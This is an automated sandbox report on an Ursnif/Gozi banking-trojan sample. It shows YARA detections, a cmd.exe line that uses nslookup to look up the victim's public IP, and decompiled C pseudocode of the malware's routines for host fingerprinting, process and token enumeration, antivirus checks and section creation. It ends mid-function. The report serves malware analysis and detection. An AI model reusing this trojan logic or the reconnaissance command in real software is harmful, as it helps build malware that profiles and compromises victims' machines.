                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                General

                                                                                Start time:00:59:02
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
                                                                                Imagebase:0x7ff622070000
                                                                                File size:273920 bytes
                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Disassembly

                                                                                Code Analysis

                                                                                  Executed Functions

                                                                                  C-Code - Quality: 93%
                                                                                  			E033F3512(signed char* __eax, intOrPtr* _a4) {
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				CHAR* _v20;
                                                                                  				struct _FILETIME _v28;
                                                                                  				void* _v32;
                                                                                  				void* _v36;
                                                                                  				char* _v40;
                                                                                  				signed int _v44;
                                                                                  				long _v344;
                                                                                  				struct _WIN32_FIND_DATAA _v368;
                                                                                  				signed int _t72;
                                                                                  				void* _t74;
                                                                                  				signed int _t76;
                                                                                  				void* _t78;
                                                                                  				intOrPtr _t81;
                                                                                  				CHAR* _t83;
                                                                                  				void* _t85;
                                                                                  				signed char _t89;
                                                                                  				signed char _t91;
                                                                                  				intOrPtr _t93;
                                                                                  				void* _t96;
                                                                                  				long _t99;
                                                                                  				int _t101;
                                                                                  				signed int _t109;
                                                                                  				char* _t111;
                                                                                  				void* _t113;
                                                                                  				int _t119;
                                                                                  				char _t128;
                                                                                  				void* _t134;
                                                                                  				signed int _t136;
                                                                                  				char* _t139;
                                                                                  				signed int _t140;
                                                                                  				char* _t141;
                                                                                  				char* _t146;
                                                                                  				signed char* _t148;
                                                                                  				int _t151;
                                                                                  				void* _t152;
                                                                                  				void* _t153;
                                                                                  				void* _t154;
                                                                                  				void* _t165;
                                                                                  
                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                  				_t148 = __eax;
                                                                                  				_t72 =  *0x33fd22c; // 0x63699bc3
                                                                                  				_t74 = RtlAllocateHeap( *0x33fd1f0, 0, _t72 ^ 0x63699ac7);
                                                                                  				_v20 = _t74;
                                                                                  				if(_t74 == 0) {
                                                                                  					L36:
                                                                                  					return _v12;
                                                                                  				}
                                                                                  				_t76 =  *0x33fd22c; // 0x63699bc3
                                                                                  				_t78 = RtlAllocateHeap( *0x33fd1f0, 0, _t76 ^ 0x63699bce);
                                                                                  				_t146 = 0;
                                                                                  				_v36 = _t78;
                                                                                  				if(_t78 == 0) {
                                                                                  					L35:
                                                                                  					HeapFree( *0x33fd1f0, _t146, _v20);
                                                                                  					goto L36;
                                                                                  				}
                                                                                  				_t136 =  *0x33fd22c; // 0x63699bc3
                                                                                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                                                  				_t81 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t154 = _t153 + 0xc;
                                                                                  				_t5 = _t81 + 0x33fe825; // 0x73797325
                                                                                  				_t83 = E033FA590(_t5);
                                                                                  				_v20 = _t83;
                                                                                  				if(_t83 == 0) {
                                                                                  					L34:
                                                                                  					HeapFree( *0x33fd1f0, _t146, _v36);
                                                                                  					goto L35;
                                                                                  				}
                                                                                  				_t134 = 0xffffffffffffffff;
                                                                                  				_v28.dwLowDateTime = 0x63699bce;
                                                                                  				_v28.dwHighDateTime = 0x63699bce;
                                                                                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                  				_v32 = _t85;
                                                                                  				if(_t85 != 0x63699bce) {
                                                                                  					GetFileTime(_t85,  &_v28, 0, 0);
                                                                                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                                                  					FindCloseChangeNotification(_v32); // executed
                                                                                  				}
                                                                                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                  				 *_t148 = _t91;
                                                                                  				_v32 = _t91 & 0x000000ff;
                                                                                  				_t93 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t16 = _t93 + 0x33fe846; // 0x642e2a5c
                                                                                  				_v40 = _t146;
                                                                                  				_v44 = _t89 & 0x000000ff;
                                                                                  				__imp__(_v20, _t16);
                                                                                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                                                  				_v16 = _t96;
                                                                                  				if(_t96 == _t134) {
                                                                                  					_t146 = 0;
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                  				while(_t99 > 0) {
                                                                                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                                                  					if(_t101 == 0) {
                                                                                  						FindClose(_v16);
                                                                                  						_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                  						_v28.dwHighDateTime = _v344;
                                                                                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                                                  					}
                                                                                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                  				}
                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                  				while(1) {
                                                                                  					_t109 = _v44;
                                                                                  					if(_v12 <= _t109) {
                                                                                  						goto L15;
                                                                                  					}
                                                                                  					_t140 = _v12;
                                                                                  					if(_t140 > _v32) {
                                                                                  						_t141 = _v36;
                                                                                  						 *_a4 = _t141;
                                                                                  						while(1) {
                                                                                  							_t128 =  *_t141;
                                                                                  							if(_t128 == 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							if(_t128 < 0x30) {
                                                                                  								 *_t141 = _t128 + 0x20;
                                                                                  							}
                                                                                  							_t141 = _t141 + 1;
                                                                                  						}
                                                                                  						_v12 = 1;
                                                                                  						FindClose(_v16); // executed
                                                                                  						_t146 = 0;
                                                                                  						goto L35;
                                                                                  					}
                                                                                  					_t165 = _t140 - _t109;
                                                                                  					L15:
                                                                                  					if(_t165 == 0 || _v12 == _v32) {
                                                                                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                                                  						_t139 = _v40;
                                                                                  						_t151 = _t111 -  &(_v368.cFileName);
                                                                                  						_t113 = 0;
                                                                                  						if(_t139 != 0) {
                                                                                  							_t48 = _t151 - 4; // -4
                                                                                  							_t113 = _t48;
                                                                                  							if(_t113 > _t151) {
                                                                                  								_t113 = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						if(_t151 > 4) {
                                                                                  							_t151 = 4;
                                                                                  						}
                                                                                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                                                  						_t154 = _t154 + 0xc;
                                                                                  						_v40 =  &(_v40[_t151]);
                                                                                  					}
                                                                                  					do {
                                                                                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                  						if(_t119 == 0) {
                                                                                  							FindClose(_v16);
                                                                                  							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                  						}
                                                                                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                  					_v12 = _v12 + 1;
                                                                                  				}
                                                                                  			}











































                                                                                  0x033f3797
                                                                                  0x00000000
                                                                                  0x033f3797
                                                                                  0x033f3663
                                                                                  0x033f36b4
                                                                                  0x033f3677
                                                                                  0x033f367f
                                                                                  0x033f3684
                                                                                  0x033f3692
                                                                                  0x033f369b
                                                                                  0x033f36a4
                                                                                  0x033f36a4
                                                                                  0x033f36b2
                                                                                  0x033f36b2
                                                                                  0x033f36b8
                                                                                  0x033f36bc
                                                                                  0x033f36bc
                                                                                  0x033f36c2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f36c4
                                                                                  0x033f36ca
                                                                                  0x033f3771
                                                                                  0x033f3774
                                                                                  0x033f3781
                                                                                  0x033f3781
                                                                                  0x033f3785
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f377a
                                                                                  0x033f377e
                                                                                  0x033f377e
                                                                                  0x033f3780
                                                                                  0x033f3780
                                                                                  0x033f378a
                                                                                  0x033f3791
                                                                                  0x033f3793
                                                                                  0x00000000
                                                                                  0x033f3793
                                                                                  0x033f36d0
                                                                                  0x033f36d2
                                                                                  0x033f36d2
                                                                                  0x033f36e5
                                                                                  0x033f36eb
                                                                                  0x033f36f6
                                                                                  0x033f36f8
                                                                                  0x033f36fc
                                                                                  0x033f36fe
                                                                                  0x033f36fe
                                                                                  0x033f3703
                                                                                  0x033f3705
                                                                                  0x033f3705
                                                                                  0x033f3703
                                                                                  0x033f370a
                                                                                  0x033f370e
                                                                                  0x033f370e
                                                                                  0x033f371e
                                                                                  0x033f3723
                                                                                  0x033f3726
                                                                                  0x033f3726
                                                                                  0x033f3729
                                                                                  0x033f3733
                                                                                  0x033f373b
                                                                                  0x033f3740
                                                                                  0x033f374e
                                                                                  0x033f374e
                                                                                  0x033f3762
                                                                                  0x033f3766
                                                                                  0x033f3766

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,033FD2E0), ref: 033F353D
                                                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 033F355F
                                                                                  • memset.NTDLL ref: 033F3579
                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,033F3592,73797325), ref: 033FA5A1
                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 033FA5BB
                                                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 033F35B7
                                                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 033F35CB
                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 033F35E2
                                                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 033F35EE
                                                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 033F362F
                                                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 033F3645
                                                                                  • CompareFileTime.KERNEL32(?,?), ref: 033F3663
                                                                                  • FindNextFileA.KERNELBASE(033F70B5,?), ref: 033F3677
                                                                                  • FindClose.KERNEL32(033F70B5), ref: 033F3684
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 033F3690
                                                                                  • CompareFileTime.KERNEL32(?,?), ref: 033F36B2
                                                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 033F36E5
                                                                                  • memcpy.NTDLL(033F533C,?,00000000), ref: 033F371E
                                                                                  • FindNextFileA.KERNELBASE(033F70B5,?), ref: 033F3733
                                                                                  • FindClose.KERNEL32(033F70B5), ref: 033F3740
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 033F374C
                                                                                  • CompareFileTime.KERNEL32(?,?), ref: 033F375C
                                                                                  • FindClose.KERNELBASE(033F70B5), ref: 033F3791
                                                                                  • HeapFree.KERNEL32(00000000,033F533C,73797325), ref: 033F37A3
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F37B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 2944988578-0
                                                                                  • Opcode ID: c38f88018dacedb420f6805b3c22903cda35bd19edb257692c1948e2f531698e
                                                                                  • Instruction ID: d3b2530ca0e33a41dbdb3eb808bd7faa953dfc34423d1c04e08509c20ccd84de
                                                                                  • Opcode Fuzzy Hash: c38f88018dacedb420f6805b3c22903cda35bd19edb257692c1948e2f531698e
                                                                                  • Instruction Fuzzy Hash: A28139B5900209EFDB11EFA5DCC8AEEBBBDFB48310F54016AE604E6254D7359A45CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 96%
                                                                                  			E033FA12A(char __eax, signed int* __esi) {
                                                                                  				long _v8;
                                                                                  				char _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v28;
                                                                                  				long _t34;
                                                                                  				signed int _t39;
                                                                                  				long _t50;
                                                                                  				char _t59;
                                                                                  				intOrPtr _t61;
                                                                                  				void* _t62;
                                                                                  				void* _t63;
                                                                                  				signed int* _t64;
                                                                                  				char _t65;
                                                                                  				intOrPtr* _t67;
                                                                                  				void* _t68;
                                                                                  				signed int* _t69;
                                                                                  
                                                                                  				_t69 = __esi;
                                                                                  				_t65 = __eax;
                                                                                  				_v8 = 0;
                                                                                  				_v12 = __eax;
                                                                                  				if(__eax == 0) {
                                                                                  					_t59 =  *0x33fd228; // 0xbd092303
                                                                                  					_v12 = _t59;
                                                                                  				}
                                                                                  				_t64 = _t69;
                                                                                  				E033F5B70( &_v12, _t64);
                                                                                  				if(_t65 != 0) {
                                                                                  					 *_t69 =  *_t69 ^  *0x33fd22c ^ 0x4c0ca0ae;
                                                                                  				} else {
                                                                                  					GetUserNameW(0,  &_v8); // executed
                                                                                  					_t50 = _v8;
                                                                                  					if(_t50 != 0) {
                                                                                  						_t62 = RtlAllocateHeap( *0x33fd1f0, 0, _t50 + _t50);
                                                                                  						if(_t62 != 0) {
                                                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                  								_t63 = _t62;
                                                                                  								 *_t69 =  *_t69 ^ E033F5AC5(_v8 + _v8, _t63);
                                                                                  							}
                                                                                  							HeapFree( *0x33fd1f0, 0, _t62);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				_t61 = __imp__;
                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                  				GetComputerNameW(0,  &_v8);
                                                                                  				_t34 = _v8;
                                                                                  				if(_t34 != 0) {
                                                                                  					_t68 = RtlAllocateHeap( *0x33fd1f0, 0, _t34 + _t34);
                                                                                  					if(_t68 != 0) {
                                                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                  							_t63 = _t68;
                                                                                  							_t69[3] = _t69[3] ^ E033F5AC5(_v8 + _v8, _t63);
                                                                                  						}
                                                                                  						HeapFree( *0x33fd1f0, 0, _t68);
                                                                                  					}
                                                                                  				}
                                                                                  				asm("cpuid");
                                                                                  				_t67 =  &_v28;
                                                                                  				 *_t67 = 1;
                                                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                  				 *(_t67 + 8) = _t63;
                                                                                  				 *(_t67 + 0xc) = _t64;
                                                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                  				_t69[1] = _t69[1] ^ _t39;
                                                                                  				return _t39;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA161
                                                                                  • RtlAllocateHeap.NTDLL(00000000,033F79C7), ref: 033FA178
                                                                                  • GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA185
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,033F79C7,?,?,?,?,?,033F87DD,?,00000001), ref: 033FA1A6
                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1CD
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 033FA1E1
                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1EE
                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 033FA20C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                                                  • String ID:
                                                                                  • API String ID: 3239747167-0
                                                                                  • Opcode ID: 85dd69768c0d79723684f6b9f13ca17464728e77602767b4932d27f3ef7cc803
                                                                                  • Instruction ID: 11ec970b6e4f60eb4ee5b58d0d0e9b0ce613c6d80445969ce68d60532735527c
                                                                                  • Opcode Fuzzy Hash: 85dd69768c0d79723684f6b9f13ca17464728e77602767b4932d27f3ef7cc803
                                                                                  • Instruction Fuzzy Hash: AD31D272A0020AEFEB11EFA9DCC4A6EB7FDFB48344F954469E505D6254DB30EA019B50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 38%
                                                                                  			E033F11A9(char _a4, void* _a8) {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				char _v16;
                                                                                  				void* _v20;
                                                                                  				char _v24;
                                                                                  				char _v28;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				char _v40;
                                                                                  				void* _v44;
                                                                                  				void** _t33;
                                                                                  				void* _t40;
                                                                                  				void* _t43;
                                                                                  				void** _t44;
                                                                                  				intOrPtr* _t47;
                                                                                  				char _t48;
                                                                                  
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				_v20 = _a4;
                                                                                  				_t48 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_a4 = 0;
                                                                                  				_v44 = 0x18;
                                                                                  				_v40 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v24 = 0;
                                                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                  					_t33 =  &_v8;
                                                                                  					__imp__(_v12, 8, _t33);
                                                                                  					if(_t33 >= 0) {
                                                                                  						_t47 = __imp__;
                                                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                  						_t44 = E033F75C4(_a4);
                                                                                  						if(_t44 != 0) {
                                                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                  							if(_t40 >= 0) {
                                                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                                                  								_t48 = 1;
                                                                                  							}
                                                                                  							E033F4C31(_t44);
                                                                                  						}
                                                                                  						NtClose(_v8); // executed
                                                                                  					}
                                                                                  					NtClose(_v12);
                                                                                  				}
                                                                                  				return _t48;
                                                                                  			}




















                                                                                  APIs
                                                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 033F11F0
                                                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 033F1203
                                                                                  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 033F121F
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 033F123C
                                                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 033F1249
                                                                                  • NtClose.NTDLL(00000000), ref: 033F125B
                                                                                  • NtClose.NTDLL(00000000), ref: 033F1265
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 2575439697-0
                                                                                  • Opcode ID: 68688c5f1bd8019e4d7da697944d14c89940d4c87ed3de7a2e0a4bc97aad7bf0
                                                                                  • Instruction ID: 53020885222dd6a7ed9735fdf15f3e69b4bde554b6d21b2df15b6dcc7b7c1118
                                                                                  • Opcode Fuzzy Hash: 68688c5f1bd8019e4d7da697944d14c89940d4c87ed3de7a2e0a4bc97aad7bf0
                                                                                  • Instruction Fuzzy Hash: 2A21F2B290021CBFDB01EFA5DC85EDEBFBDEB08B40F504026FA00E6154D7719A549BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 73%
                                                                                  			E033F8714(signed int __edx, intOrPtr _a4) {
                                                                                  				struct _FILETIME _v12;
                                                                                  				char _v32;
                                                                                  				long _v40;
                                                                                  				void* _t14;
                                                                                  				void* _t16;
                                                                                  				int _t18;
                                                                                  				signed int _t20;
                                                                                  				void* _t22;
                                                                                  				signed int _t23;
                                                                                  				intOrPtr _t25;
                                                                                  				unsigned int _t29;
                                                                                  				signed int _t33;
                                                                                  				signed int _t40;
                                                                                  
                                                                                  				_t33 = __edx;
                                                                                  				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                                                                  				 *0x33fd1f0 = _t14;
                                                                                  				if(_t14 != 0) {
                                                                                  					 *0x33fd160 = GetTickCount();
                                                                                  					_t16 = E033F7A5D(_a4);
                                                                                  					if(_t16 != 0) {
                                                                                  						L10:
                                                                                  						return _t16;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					do {
                                                                                  						L3:
                                                                                  						GetSystemTimeAsFileTime( &_v12);
                                                                                  						_t18 = SwitchToThread();
                                                                                  						_t29 = _v12.dwHighDateTime;
                                                                                  						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                                                  						_push(0);
                                                                                  						_push(9);
                                                                                  						_push(_t29 >> 7);
                                                                                  						_push(_t20);
                                                                                  						L033FB03E();
                                                                                  						_t40 = _t18 + _t20;
                                                                                  						_t22 = E033F501B(_a4, _t40);
                                                                                  						_t23 = 2;
                                                                                  						Sleep(_t23 << _t40); // executed
                                                                                  					} while (_t22 == 1);
                                                                                  					_t25 =  *0x33fd20c; // 0x2dc
                                                                                  					_v32 = 0;
                                                                                  					if(_t25 != 0) {
                                                                                  						__imp__(_t25,  &_v32);
                                                                                  						if(_t25 == 0) {
                                                                                  							_v40 = 0;
                                                                                  						}
                                                                                  						if(_v40 != 0) {
                                                                                  							 *0x33fd218 = 1; // executed
                                                                                  						}
                                                                                  					}
                                                                                  					_t16 = E033F77EB(_t33); // executed
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				_t16 = 8;
                                                                                  				goto L10;
                                                                                  			}

















                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 033F8729
                                                                                  • GetTickCount.KERNEL32 ref: 033F8740
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 033F8760
                                                                                  • SwitchToThread.KERNEL32(?,00000001), ref: 033F8766
                                                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 033F8782
                                                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 033F879C
                                                                                  • IsWow64Process.KERNEL32(000002DC,?,?,00000001), ref: 033F87BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                                                  • String ID:
                                                                                  • API String ID: 3690864001-0
                                                                                  • Opcode ID: f73ae9a99abe5f5f02a5d7ffb51a660d51569ac6c7e12a40084d6ec838b8ceeb
                                                                                  • Instruction ID: d61f6ae35566413603b62db65e7a1e2577ed08bfdddb3a5b025f7f3f4af47266
                                                                                  • Opcode Fuzzy Hash: f73ae9a99abe5f5f02a5d7ffb51a660d51569ac6c7e12a40084d6ec838b8ceeb
                                                                                  • Instruction Fuzzy Hash: 4D21C0B2A00305AFD710FF64ECC8B6ABBECEB44354F844929F655CA240D738D8088B61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E033F31DD() {
                                                                                  				char _v264;
                                                                                  				void* _v300;
                                                                                  				void* _t5;
                                                                                  				int _t8;
                                                                                  				intOrPtr _t9;
                                                                                  				int _t15;
                                                                                  				void* _t17;
                                                                                  
                                                                                  				_t15 = 0;
                                                                                  				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                  				_t17 = _t5;
                                                                                  				if(_t17 != 0) {
                                                                                  					_t8 = Process32First(_t17,  &_v300);
                                                                                  					while(_t8 != 0) {
                                                                                  						_t9 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t2 = _t9 + 0x33fedf8; // 0x73617661
                                                                                  						_push( &_v264);
                                                                                  						if( *0x33fd0fc() != 0) {
                                                                                  							_t15 = 1;
                                                                                  						} else {
                                                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                                                  							continue;
                                                                                  						}
                                                                                  						L7:
                                                                                  						FindCloseChangeNotification(_t17); // executed
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					goto L7;
                                                                                  				}
                                                                                  				L8:
                                                                                  				return _t15;
                                                                                  			}











                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 033F31ED
                                                                                  • Process32First.KERNEL32(00000000,?), ref: 033F3200
                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 033F322C
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 033F323B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3243318325-0
                                                                                  • Opcode ID: 51c80ef75020bc5b63005547ea942934bb52116db60fa7f1bcdfa6f6a2d55c3f
                                                                                  • Instruction ID: 50ccf667d30df898c99d1a78191fc24ebc6343ab05577e8c424c3354a3182160
                                                                                  • Opcode Fuzzy Hash: 51c80ef75020bc5b63005547ea942934bb52116db60fa7f1bcdfa6f6a2d55c3f
                                                                                  • Instruction Fuzzy Hash: 68F0907A5001657FDB20F666DCC8EEF76ACDBC5720F8001A1EB15D7044EB24DA4A86A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 72%
                                                                                  			E033F4F73(intOrPtr* __eax, void** _a4) {
                                                                                  				int _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				int _v28;
                                                                                  				int _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				int _v40;
                                                                                  				int _v44;
                                                                                  				void* _v48;
                                                                                  				void* __esi;
                                                                                  				long _t34;
                                                                                  				void* _t39;
                                                                                  				void* _t47;
                                                                                  				intOrPtr* _t48;
                                                                                  
                                                                                  				_t48 = __eax;
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v48 = 0x18;
                                                                                  				_v44 = 0;
                                                                                  				_v36 = 0x40;
                                                                                  				_v40 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                  				if(_t34 < 0) {
                                                                                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                  				} else {
                                                                                  					 *_t48 = _v16;
                                                                                  					_t39 = E033F34D0(_t48,  &_v12); // executed
                                                                                  					_t47 = _t39;
                                                                                  					if(_t47 != 0) {
